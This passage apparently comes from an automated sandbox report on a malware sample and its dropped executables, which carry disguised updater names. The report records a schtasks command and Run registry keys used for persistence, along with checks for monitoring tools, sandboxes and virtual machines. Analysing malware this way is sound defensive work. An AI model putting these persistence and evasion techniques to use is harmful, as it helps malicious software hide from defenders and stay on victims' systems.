                          Source: 1tu3JEnOc1WEcDVr1Q0N.exe.6.drStatic PE information: section name: gakjennq entropy: 7.937614618758915
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: 65cFitrzjaGsYAt5EzWY.exe.6.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: plaza[1].exe.7.drStatic PE information: section name: entropy: 7.9995895382203415
                          Source: plaza[1].exe.7.drStatic PE information: section name: entropy: 7.994718740396702
                          Source: plaza[1].exe.7.drStatic PE information: section name: entropy: 7.317669714978704
                          Source: plaza[1].exe.7.drStatic PE information: section name: entropy: 7.980069567821621
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name: entropy: 7.9995895382203415
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name: entropy: 7.994718740396702
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name: entropy: 7.317669714978704
                          Source: UP_uKSEYzgg0BHrTE9Qz.exe.7.drStatic PE information: section name: entropy: 7.980069567821621
                          Source: ladas[1].exe.7.drStatic PE information: section name: entropy: 7.9816083368851425
                          Source: ladas[1].exe.7.drStatic PE information: section name: gakjennq entropy: 7.952472916491743
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name: entropy: 7.9816083368851425
                          Source: IK6nP7Vsyy6xQfngv8hq.exe.7.drStatic PE information: section name: gakjennq entropy: 7.952472916491743
                          Source: amert[1].exe.7.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: amert[1].exe.7.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: soOc6NhyUO7lFaV2eQJV.exe.7.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: niks[1].exe.7.drStatic PE information: section name: entropy: 7.7572223404822385
                          Source: niks[1].exe.7.drStatic PE information: section name: odmizeae entropy: 7.953394185636523
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name: entropy: 7.7572223404822385
                          Source: UdgmfEtw7ukqXx7vdO3L.exe.7.drStatic PE information: section name: odmizeae entropy: 7.953394185636523
                          Source: explorgu.exe.47.drStatic PE information: section name: entropy: 7.983283984265927
                          Source: explorgu.exe.47.drStatic PE information: section name: tfywulqz entropy: 7.953132205040275
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\amert[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\plaza[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\sy4bhhGvZ9bFDDZTr89U.exeJump to dropped file
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll.tmpJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\aCN0ucpg7A4ErZQbp9NR.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amert[1].exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\niks[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\zs1nXDHCjbiIGotgg4qJ.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\fu[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\well[1].exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\yk50FvD1XOCg2Y2iAkjB.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\UdgmfEtw7ukqXx7vdO3L.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\fu[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\fkGORKNF0MOvzFIhlS3N.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\well[1].exeJump to dropped file
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll (copy)Jump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ladas[1].exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\UP_uKSEYzgg0BHrTE9Qz.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\niks[1].exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\1tu3JEnOc1WEcDVr1Q0N.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\ZLGJz1zjooaGjpiGIhT0.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\65cFitrzjaGsYAt5EzWY.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Temp\EdgeMS131\EdgeMS131.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\plaza[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\well[1].exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\HgvXSle13lm2R30FoCuW.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\ZUEHnz5YzDsyCHbnegZs.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidiMl1n683teX9h\dZPbe9okQutRw6uffMvo.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\IK6nP7Vsyy6xQfngv8hq.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Temp\heidibBzuPduPgFBl\soOc6NhyUO7lFaV2eQJV.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\RhvHlFoQ86AMGIsTANJB.exeJump to dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\ladas[1].exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeJump to dropped file

                          Boot Survival

                          barindex
                          Creates multiple autostart registry keys
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131Jump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV131Jump to behavior
                          Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClass
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonClass
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClass
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: Regmonclass
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: Filemonclass
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeWindow searched: window name: Regmonclass
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeWindow searched: window name: FilemonClass
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeWindow searched: window name: RegmonClass
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeWindow searched: window name: FilemonClass
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeWindow searched: window name: FilemonClass
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeWindow searched: window name: RegmonClass
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeWindow searched: window name: FilemonClass
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Uses schtasks.exe or at.exe to add and modify task schedules
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnkJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile created: C:\Windows\Tasks\explorgu.job
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnkJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131Jump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131Jump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV131Jump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV131Jump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Tries to detect sandboxes / dynamic malware analysis system (registry check)
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Tries to detect virtualization through RDTSC time measurements
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 000000000016F99D second address: 000000000016F9A7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7E95068B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002F1DD0 second address: 00000000002F1DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002E51C6 second address: 00000000002E51E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E95068B2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d ja 00007F7E95068B26h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002E51E2 second address: 00000000002E51F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E9537666Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002E51F4 second address: 00000000002E51FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002F155D second address: 00000000002F1561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002F16A6 second address: 00000000002F16C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E95068B33h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002F4569 second address: 00000000002F4582 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7E95376671h 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRDTSC instruction interceptor: First address: 00000000002F4582 second address: 00000000002F4586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
